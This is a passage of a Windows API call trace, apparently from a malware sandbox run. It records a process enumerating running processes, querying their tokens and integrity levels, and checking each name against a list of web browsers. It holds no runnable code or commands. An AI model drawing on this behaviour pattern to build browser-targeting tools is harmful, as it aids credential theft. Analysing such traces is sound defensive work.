lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.632] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.632] GetLastError () returned 0x7a [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.632] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.632] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.632] CloseHandle (hObject=0xb8) returned 1 [0323.632] CloseHandle (hObject=0xb4) returned 1 [0323.632] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0323.632] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0323.632] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0323.632] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0323.632] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0323.632] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0323.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0323.632] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.632] GetLastError () returned 0x7a [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.632] CloseHandle (hObject=0xb8) returned 1 [0323.632] CloseHandle (hObject=0xb4) returned 1 [0323.632] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0xb4 [0323.632] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97060, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.632] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.632] GetLastError () returned 0x7a [0323.632] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.632] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.633] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.633] CloseHandle (hObject=0xb8) returned 1 [0323.633] CloseHandle (hObject=0xb4) returned 1 [0323.633] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0323.633] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0323.633] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0323.633] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0323.633] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0323.633] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0323.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0323.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0323.633] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.633] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.633] GetLastError () returned 0x7a [0323.633] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.633] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.633] CloseHandle (hObject=0xb8) returned 1 [0323.633] CloseHandle (hObject=0xb4) returned 1 [0323.633] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0xb4 [0323.633] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97968, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.633] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.633] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.633] GetLastError () returned 0x7a [0323.633] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.633] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.633] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.633] CloseHandle (hObject=0xb8) returned 1 [0323.633] CloseHandle (hObject=0xb4) returned 1 [0323.634] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.634] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.634] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0323.634] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.634] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.634] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0323.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0323.634] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.634] GetLastError () returned 0x7a [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.634] CloseHandle (hObject=0xb8) returned 1 [0323.634] CloseHandle (hObject=0xb4) returned 1 [0323.634] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0323.634] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97d10, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.634] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.634] GetLastError () returned 0x7a [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.634] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.634] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.634] CloseHandle (hObject=0xb8) returned 1 [0323.634] CloseHandle (hObject=0xb4) returned 1 [0323.634] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0323.634] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0323.634] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0323.634] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0323.634] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0323.634] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0323.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0323.634] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.634] GetLastError () returned 0x7a [0323.634] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.635] CloseHandle (hObject=0xb8) returned 1 [0323.635] CloseHandle (hObject=0xb4) returned 1 [0323.635] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xb4 [0323.635] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x97ea8, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.635] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.635] GetLastError () returned 0x7a [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.635] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.635] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.635] CloseHandle (hObject=0xb8) returned 1 [0323.635] CloseHandle (hObject=0xb4) returned 1 [0323.635] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0323.635] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0323.635] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0323.635] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0323.635] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0323.635] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0323.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0323.635] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0323.635] GetLastError () returned 0x7a [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0323.635] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0323.635] CloseHandle (hObject=0xb8) returned 1 [0323.635] CloseHandle (hObject=0xb4) returned 1 [0323.635] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0323.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0xb4 [0323.635] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x983c0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0323.635] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0323.636] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0323.636] GetLastError () returned 0x7a [0323.636] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0323.636] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0323.636] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0323.636] CloseHandle (hObject=0xb8) returned 1 [0323.636] CloseHandle (hObject=0xb4) returned 1 [0323.636] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0323.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0323.636] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0323.636] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0325.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x260fd04 | out: SystemInformation=0x0, ResultLength=0x260fd04*=0xaf50) returned 0xc0000004 [0325.642] VirtualAlloc (lpAddress=0x0, dwSize=0xbf50, flAllocationType=0x1000, flProtect=0x4) returned 0x90000 [0325.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x90000, Length=0xbf50, ResultLength=0x0 | out: SystemInformation=0x90000, ResultLength=0x0) returned 0x0 [0325.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0325.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0325.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0325.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0325.646] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.646] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.646] GetLastError () returned 0x7a [0325.646] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: TokenInformation=0x43c708, ReturnLength=0x260fcb4) returned 1 [0325.646] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x260fce4, TokenInformationLength=0x4, ReturnLength=0x260fcc8 | out: TokenInformation=0x260fce4, ReturnLength=0x260fcc8) returned 1 [0325.646] CloseHandle (hObject=0xb8) returned 1 [0325.646] CloseHandle (hObject=0xb4) returned 1 [0325.646] GetLengthSid (pSid=0x43c710*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0325.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb4 [0325.647] GetVersionExW (in: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x987a0, dwBuildNumber=0x8600e462, dwPlatformId=0x4af890, szCSDVersion="\x01") | out: lpVersionInformation=0x260fbb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0325.647] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x260fce4 | out: TokenHandle=0x260fce4*=0xb8) returned 1 [0325.647] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fce0 | out: TokenInformation=0x0, ReturnLength=0x260fce0) returned 0 [0325.647] GetLastError () returned 0x7a [0325.647] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x43cc18, TokenInformationLength=0x14, ReturnLength=0x260fce0 | out: TokenInformation=0x43cc18, ReturnLength=0x260fce0) returned 1 [0325.647] GetSidSubAuthorityCount (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x43cc21 [0325.647] GetSidSubAuthority (pSid=0x43cc20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x43cc28 [0325.647] CloseHandle (hObject=0xb8) returned 1 [0325.648] CloseHandle (hObject=0xb4) returned 1 [0325.648] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0325.648] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0325.648] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0325.649] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0325.649] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0325.649] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0325.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0325.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0xb4 [0325.649] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x260fccc | out: TokenHandle=0x260fccc*=0xb8) returned 1 [0325.649] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x260fcb4 | out: TokenInformation=0x0, ReturnLength=0x260fcb4) returned 0 [0325.649] GetLastError () returned 0x7a [0325.649] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x43c708, TokenInformationLength=0x24, ReturnLength=0x260fcb4 | out: 